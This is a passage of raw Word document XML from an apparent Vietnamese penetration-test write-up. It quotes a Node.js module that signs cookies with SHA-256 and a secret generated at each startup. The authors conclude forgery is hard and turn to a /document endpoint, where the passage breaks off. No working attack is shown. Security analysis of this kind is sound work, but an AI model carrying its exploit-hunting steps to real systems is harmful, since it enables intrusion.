          <w:p w14:paraId="2EC687A1" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="114DF466" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A59669" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49884489" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBA287E" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB032C0" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2597ECCF" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50647AD2" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39C897EA" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> crypto = require(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"crypto"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F78CCBD" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="38535B9B" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> generateRandomString = (length = 16) =&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70EE2731" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  crypto.randomBytes(length).toString(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"hex"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B62737D" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="0AF589CF" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> SECRET = generateRandomString(32);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B4865F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="10939885" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> createHash = (s) =&gt; crypto.createHash(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"sha256"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>).update(s).digest(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"hex"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094EEE07" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="340E2F80" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> signString = (s) =&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F411ABE" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  crypto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FABAB50" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">    .createHash(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"sha256"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D7F00F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">    .update(s + SECRET)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52213AAD" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">    .digest(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"hex"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FD4E6C6" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="05A6114D" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> generateCookie = (username, id) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF26281" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> stringifiedUser = btoa(JSON.stringify({ username, id }));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B9DD28" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> sig = signString(stringifiedUser);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C662FC2" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>`</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>${</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>stringifiedUser</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>${</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>sig</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>`</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0742F25B" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E584E79" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="0CC74164" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> validate = (s) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53244D1A" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> parts = s.split(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"-"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32AECBFE" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> (parts.length !== 2) </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D4982D" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> signString(parts[0]) === parts[1];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DEEC6F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0721425B" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="21FB6358" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> generateAccessCode = () =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441EE8FB" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> randomBytes = crypto.randomBytes(2);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70DCBFFE" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> secureCode = (randomBytes.readUInt16BE() % 10000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FBE792B" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">    .toString()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293B573D" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">    .padStart(4, </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"0"</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648E9939" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="4D990649" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> secureCode;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0292EB8D" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59632935" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA"/>
          <w:p w14:paraId="4C30BDCF" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>module.exports = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04EE79BB" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  generateCookie,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC0B201" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  createHash,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A79BD9C" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  signString,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6BDD11" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  validate,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240CB563" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  generateRandomString,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16975323" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve">  generateAccessCode,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465D13B9" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1153B6FD" w14:textId="77777777" w:rsidR="00742F6E" w:rsidRDefault="00742F6E"/>
    <w:p w14:paraId="324EF1DA" w14:textId="7D9F6CBA" w:rsidR="00742F6E" w:rsidRDefault="0061528C" w:rsidP="00A0539F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061528C">
        <w:t xml:space="preserve">Thông qua việc kiểm tra mã nguồn, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">có thể </w:t>
      </w:r>
      <w:r w:rsidRPr="0061528C">
        <w:t xml:space="preserve">xác định hệ thống sử dụng cơ chế tự tạo chữ ký số để bảo vệ nội dung </w:t>
      </w:r>
      <w:r>
        <w:t>cookie. Cụ thể:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C732228" w14:textId="2E80D7EE" w:rsidR="0061528C" w:rsidRPr="0061528C" w:rsidRDefault="0061528C" w:rsidP="00A0539F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061528C">
        <w:t>Thông tin người dùng (username, id) được chuyển thành chuỗi JSON, sau đó mã hóa bằng Base64 thông qua btoa().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F21AC5" w14:textId="6E54CAEF" w:rsidR="0061528C" w:rsidRPr="0061528C" w:rsidRDefault="0061528C" w:rsidP="00A0539F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061528C">
        <w:t xml:space="preserve">Chữ ký số được tạo bằng cách nối chuỗi Base64 với một khóa bí mật (SECRET) </w:t>
      </w:r>
      <w:r w:rsidR="00603897" w:rsidRPr="00603897">
        <w:t>được tạo ngẫu nhiên mỗi lần khởi động</w:t>
      </w:r>
      <w:r w:rsidR="00603897">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0061528C">
        <w:t>và băm bằng thuật toán SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF9C0ED" w14:textId="407A7731" w:rsidR="0061528C" w:rsidRPr="0061528C" w:rsidRDefault="0061528C" w:rsidP="00A0539F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061528C">
        <w:t>Cookie được tạo dưới dạng:</w:t>
      </w:r>
      <w:r w:rsidR="004F1E6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F1E6A" w:rsidRPr="004F1E6A">
        <w:t>&lt;Base64 thông tin người dùng&gt;-&lt;SHA256(Base64 + SECRET)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB512D" w14:textId="7FF9D50C" w:rsidR="00A0539F" w:rsidRPr="00A0539F" w:rsidRDefault="00A0539F" w:rsidP="00A0539F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0539F">
        <w:t>Qua quá trình phân tích mã nguồn, nhóm kiểm thử nhận thấy rằng khóa bí mật (SECRET) dùng để tạo chữ ký cho cookie được sinh ngẫu nhiên mỗi lần khởi động ứng dụng và không được lưu trữ cố định. Điều này khiến việc giả mạo chữ ký trở nên rất khó khăn, do không thể tái tạo chính xác giá trị hash mà hệ thống sử dụng để xác thực tính toàn vẹn của cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351D409" w14:textId="01D7C3A7" w:rsidR="00742F6E" w:rsidRDefault="00A0539F" w:rsidP="00157097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0539F">
        <w:t>Do đó, nhóm kiểm thử quyết định chuyển hướng sang các vị trí khác trong ứng dụng để tiếp tục tìm kiếm các điểm yếu tiềm năng có thể khai thác.</w:t>
      </w:r>
      <w:r w:rsidR="00612B1E">
        <w:t xml:space="preserve"> Và thật may mắn khi đọc chức năng của endpoint </w:t>
      </w:r>
      <w:r w:rsidR="00157097">
        <w:t xml:space="preserve">/document thì mình phát hiện điều này: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="8752"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB1961" w:rsidRPr="00157097" w14:paraId="1C11BF4E" w14:textId="77777777" w:rsidTr="00157097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A5F9242" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BB1961">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7AAFE9" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20BB77DB" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F1C9ED" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20DC59DF" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40709282" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39B15E8B" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6484C1C0" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
